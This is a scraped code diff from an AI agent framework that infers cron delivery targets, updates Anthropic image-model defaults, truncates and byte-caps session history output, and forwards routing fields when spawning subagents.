||||
// [Fix Issue 3] Infer delivery target from session key for isolated jobs if not provided
|
||||
if (
|
||||
opts?.agentSessionKey &&
|
||||
job &&
|
||||
typeof job === "object" &&
|
||||
"payload" in job &&
|
||||
(job as { payload?: { kind?: string } }).payload?.kind === "agentTurn"
|
||||
) {
|
||||
const deliveryValue = (job as { delivery?: unknown }).delivery;
|
||||
const delivery = isRecord(deliveryValue) ? deliveryValue : undefined;
|
||||
const modeRaw = typeof delivery?.mode === "string" ? delivery.mode : "";
|
||||
const mode = modeRaw.trim().toLowerCase();
|
||||
const hasTarget =
|
||||
(typeof delivery?.channel === "string" && delivery.channel.trim()) ||
|
||||
(typeof delivery?.to === "string" && delivery.to.trim());
|
||||
const shouldInfer =
|
||||
(deliveryValue == null || delivery) && mode !== "none" && !hasTarget;
|
||||
if (shouldInfer) {
|
||||
const inferred = inferDeliveryFromSessionKey(opts.agentSessionKey);
|
||||
if (inferred) {
|
||||
(job as { delivery?: unknown }).delivery = {
|
||||
...delivery,
|
||||
...inferred,
|
||||
} satisfies CronDelivery;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
const contextMessages =
|
||||
typeof params.contextMessages === "number" && Number.isFinite(params.contextMessages)
|
||||
? params.contextMessages
|
||||
|
||||
@@ -24,6 +24,8 @@ import {
|
||||
} from "./image-tool.helpers.js";
|
||||
|
||||
const DEFAULT_PROMPT = "Describe the image.";
|
||||
const ANTHROPIC_IMAGE_PRIMARY = "anthropic/claude-opus-4-6";
|
||||
const ANTHROPIC_IMAGE_FALLBACK = "anthropic/claude-opus-4-5";
|
||||
|
||||
export const __testing = {
|
||||
decodeDataUrl,
|
||||
@@ -117,7 +119,7 @@ export function resolveImageModelConfigForTool(params: {
|
||||
} else if (primary.provider === "openai" && openaiOk) {
|
||||
preferred = "openai/gpt-5-mini";
|
||||
} else if (primary.provider === "anthropic" && anthropicOk) {
|
||||
preferred = "anthropic/claude-opus-4-5";
|
||||
preferred = ANTHROPIC_IMAGE_PRIMARY;
|
||||
}
|
||||
|
||||
if (preferred?.trim()) {
|
||||
@@ -125,7 +127,7 @@ export function resolveImageModelConfigForTool(params: {
|
||||
addFallback("openai/gpt-5-mini");
|
||||
}
|
||||
if (anthropicOk) {
|
||||
addFallback("anthropic/claude-opus-4-5");
|
||||
addFallback(ANTHROPIC_IMAGE_FALLBACK);
|
||||
}
|
||||
// Don't duplicate primary in fallbacks.
|
||||
const pruned = fallbacks.filter((ref) => ref !== preferred);
|
||||
@@ -138,7 +140,7 @@ export function resolveImageModelConfigForTool(params: {
|
||||
// Cross-provider fallback when we can't pair with the primary provider.
|
||||
if (openaiOk) {
|
||||
if (anthropicOk) {
|
||||
addFallback("anthropic/claude-opus-4-5");
|
||||
addFallback(ANTHROPIC_IMAGE_FALLBACK);
|
||||
}
|
||||
return {
|
||||
primary: "openai/gpt-5-mini",
|
||||
@@ -146,7 +148,10 @@ export function resolveImageModelConfigForTool(params: {
|
||||
};
|
||||
}
|
||||
if (anthropicOk) {
|
||||
return { primary: "anthropic/claude-opus-4-5" };
|
||||
return {
|
||||
primary: ANTHROPIC_IMAGE_PRIMARY,
|
||||
fallbacks: [ANTHROPIC_IMAGE_FALLBACK],
|
||||
};
|
||||
}
|
||||
|
||||
return null;
|
||||
|
||||
@@ -2,7 +2,9 @@ import { Type } from "@sinclair/typebox";
|
||||
import type { AnyAgentTool } from "./common.js";
|
||||
import { loadConfig } from "../../config/config.js";
|
||||
import { callGateway } from "../../gateway/call.js";
|
||||
import { capArrayByJsonBytes } from "../../gateway/session-utils.fs.js";
|
||||
import { isSubagentSessionKey, resolveAgentIdFromSessionKey } from "../../routing/session-key.js";
|
||||
import { truncateUtf16Safe } from "../../utils.js";
|
||||
import { jsonResult, readStringParam } from "./common.js";
|
||||
import {
|
||||
createAgentToAgentPolicy,
|
||||
@@ -19,6 +21,131 @@ const SessionsHistoryToolSchema = Type.Object({
|
||||
includeTools: Type.Optional(Type.Boolean()),
|
||||
});
|
||||
|
||||
const SESSIONS_HISTORY_MAX_BYTES = 80 * 1024;
|
||||
const SESSIONS_HISTORY_TEXT_MAX_CHARS = 4000;
|
||||
|
||||
/**
 * Limits a history text to SESSIONS_HISTORY_TEXT_MAX_CHARS.
 *
 * @param text - Text to limit.
 * @returns The text unchanged with `truncated: false` when it is within the limit; otherwise
 *   the text cut by `truncateUtf16Safe` followed by a truncation marker, with `truncated: true`.
 */
function truncateHistoryText(text: string): { text: string; truncated: boolean } {
  const overLimit = text.length > SESSIONS_HISTORY_TEXT_MAX_CHARS;
  if (!overLimit) {
    return { text, truncated: false };
  }
  const head = truncateUtf16Safe(text, SESSIONS_HISTORY_TEXT_MAX_CHARS);
  return { text: head + "\n…(truncated)…", truncated: true };
}
|
||||
|
||||
/**
 * Returns a size-reduced shallow copy of one message content block.
 *
 * String `text`, `thinking` (thinking blocks only) and `partialJson` fields are truncated,
 * `thinkingSignature` is dropped from thinking blocks, and image blocks lose their `data`
 * in exchange for `omitted: true` plus the data's string length in `bytes`.
 *
 * @param block - Content block; non-object values are returned untouched.
 * @returns The sanitized block and whether anything was shortened or removed.
 */
function sanitizeHistoryContentBlock(block: unknown): { block: unknown; truncated: boolean } {
  if (typeof block !== "object" || block === null) {
    return { block, truncated: false };
  }

  const entry: Record<string, unknown> = { ...(block as Record<string, unknown>) };
  const kind = typeof entry.type === "string" ? entry.type : "";
  let truncated = false;

  // Truncates entry[key] in place when it holds a string.
  const clip = (key: string): void => {
    const value = entry[key];
    if (typeof value !== "string") {
      return;
    }
    const res = truncateHistoryText(value);
    entry[key] = res.text;
    truncated ||= res.truncated;
  };

  clip("text");

  if (kind === "thinking") {
    clip("thinking");
    // The encrypted signature can be extremely large and is not useful for history recall.
    if ("thinkingSignature" in entry) {
      delete entry.thinkingSignature;
      truncated = true;
    }
  }

  clip("partialJson");

  if (kind === "image") {
    // Record the payload length before dropping it; an empty or non-string payload has none.
    const bytes = typeof entry.data === "string" && entry.data ? entry.data.length : undefined;
    if ("data" in entry) {
      delete entry.data;
      truncated = true;
    }
    entry.omitted = true;
    if (bytes !== undefined) {
      entry.bytes = bytes;
    }
  }

  return { block: entry, truncated };
}
|
||||
|
||||
/**
 * Returns a size-reduced shallow copy of one history message.
 *
 * `details`, `usage` and `cost` are removed, string `content` and `text` are truncated, and
 * array `content` is sanitized block by block.
 *
 * @param message - History message; non-object values are returned untouched.
 * @returns The sanitized message and whether anything was shortened or removed.
 */
function sanitizeHistoryMessage(message: unknown): { message: unknown; truncated: boolean } {
  if (typeof message !== "object" || message === null) {
    return { message, truncated: false };
  }

  const entry: Record<string, unknown> = { ...(message as Record<string, unknown>) };
  let truncated = false;

  // Tool result details often contain very large nested payloads; usage and cost are dropped too.
  for (const key of ["details", "usage", "cost"]) {
    if (key in entry) {
      delete entry[key];
      truncated = true;
    }
  }

  const content = entry.content;
  if (typeof content === "string") {
    const res = truncateHistoryText(content);
    entry.content = res.text;
    truncated = truncated || res.truncated;
  } else if (Array.isArray(content)) {
    const sanitized = content.map((block) => sanitizeHistoryContentBlock(block));
    entry.content = sanitized.map((item) => item.block);
    truncated = truncated || sanitized.some((item) => item.truncated);
  }

  const text = entry.text;
  if (typeof text === "string") {
    const res = truncateHistoryText(text);
    entry.text = res.text;
    truncated = truncated || res.truncated;
  }

  return { message: entry, truncated };
}
|
||||
|
||||
/**
 * Measures how many UTF-8 bytes a value occupies once serialised as JSON.
 *
 * If JSON serialisation (or measuring its result) throws — for example on a
 * circular structure, or when `JSON.stringify` yields `undefined` — the size
 * of `String(value)` is returned instead.
 *
 * @param value - Any value to measure.
 * @returns The byte length of the JSON text, or of the string fallback.
 */
function jsonUtf8Bytes(value: unknown): number {
  const utf8Length = (text: string): number => Buffer.byteLength(text, "utf8");
  try {
    return utf8Length(JSON.stringify(value));
  } catch {
    // Serialisation failed or produced a non-string; fall back to the plain string form.
    return utf8Length(String(value));
  }
}
|
||||
|
||||
/**
 * Applies a final size limit to an already-capped list of history items.
 *
 * - When `bytes` is within `maxBytes`, the input is returned unchanged with
 *   `hardCapped: false`.
 * - Otherwise only the last item is kept (or nothing, if the last item is
 *   missing or falsy), provided that single-item list fits within `maxBytes`.
 * - If even that is too large, a single placeholder assistant message is
 *   returned in its place.
 *
 * @param params.items - The candidate history items.
 * @param params.bytes - The caller-supplied size of `items`.
 * @param params.maxBytes - The size limit to enforce.
 * @returns The surviving items, their measured size, and whether the hard cap
 *   had to be applied.
 */
function enforceSessionsHistoryHardCap(params: {
  items: unknown[];
  bytes: number;
  maxBytes: number;
}): { items: unknown[]; bytes: number; hardCapped: boolean } {
  const { items, bytes, maxBytes } = params;
  if (bytes <= maxBytes) {
    return { items, bytes, hardCapped: false };
  }

  // Fall back to just the most recent item when the full list is too big.
  const newest = items[items.length - 1];
  const tail: unknown[] = newest ? [newest] : [];
  const tailBytes = jsonUtf8Bytes(tail);
  if (tailBytes <= maxBytes) {
    return { items: tail, bytes: tailBytes, hardCapped: true };
  }

  // Even the newest item alone is over the limit: substitute a short notice.
  const fallback = [
    {
      role: "assistant",
      content: "[sessions_history omitted: message too large]",
    },
  ];
  return { items: fallback, bytes: jsonUtf8Bytes(fallback), hardCapped: true };
}
|
||||
|
||||
/**
 * Reads `agents.defaults.sandbox.sessionToolsVisibility` from the config.
 *
 * @param cfg - The loaded configuration.
 * @returns The configured value, or `"spawned"` when any part of that path is
 *   null or undefined.
 */
function resolveSandboxSessionToolsVisibility(cfg: ReturnType<typeof loadConfig>) {
  const configured = cfg.agents?.defaults?.sandbox?.sessionToolsVisibility;
  return configured ?? "spawned";
}
|
||||
@@ -131,10 +258,26 @@ export function createSessionsHistoryTool(opts?: {
|
||||
params: { sessionKey: resolvedKey, limit },
|
||||
});
|
||||
const rawMessages = Array.isArray(result?.messages) ? result.messages : [];
|
||||
const messages = includeTools ? rawMessages : stripToolMessages(rawMessages);
|
||||
const selectedMessages = includeTools ? rawMessages : stripToolMessages(rawMessages);
|
||||
const sanitizedMessages = selectedMessages.map((message) => sanitizeHistoryMessage(message));
|
||||
const contentTruncated = sanitizedMessages.some((entry) => entry.truncated);
|
||||
const cappedMessages = capArrayByJsonBytes(
|
||||
sanitizedMessages.map((entry) => entry.message),
|
||||
SESSIONS_HISTORY_MAX_BYTES,
|
||||
);
|
||||
const droppedMessages = cappedMessages.items.length < selectedMessages.length;
|
||||
const hardened = enforceSessionsHistoryHardCap({
|
||||
items: cappedMessages.items,
|
||||
bytes: cappedMessages.bytes,
|
||||
maxBytes: SESSIONS_HISTORY_MAX_BYTES,
|
||||
});
|
||||
return jsonResult({
|
||||
sessionKey: displayKey,
|
||||
messages,
|
||||
messages: hardened.items,
|
||||
truncated: droppedMessages || contentTruncated || hardened.hardCapped,
|
||||
droppedMessages: droppedMessages || hardened.hardCapped,
|
||||
contentTruncated,
|
||||
bytes: hardened.bytes,
|
||||
});
|
||||
},
|
||||
};
|
||||
|
||||
@@ -231,6 +231,10 @@ export function createSessionsSpawnTool(opts?: {
|
||||
message: task,
|
||||
sessionKey: childSessionKey,
|
||||
channel: requesterOrigin?.channel,
|
||||
to: requesterOrigin?.to ?? undefined,
|
||||
accountId: requesterOrigin?.accountId ?? undefined,
|
||||
threadId:
|
||||
requesterOrigin?.threadId != null ? String(requesterOrigin.threadId) : undefined,
|
||||
idempotencyKey: childIdem,
|
||||
deliver: false,
|
||||
lane: AGENT_LANE_SUBAGENT,
|
||||
|
||||
Reference in New Issue
Block a user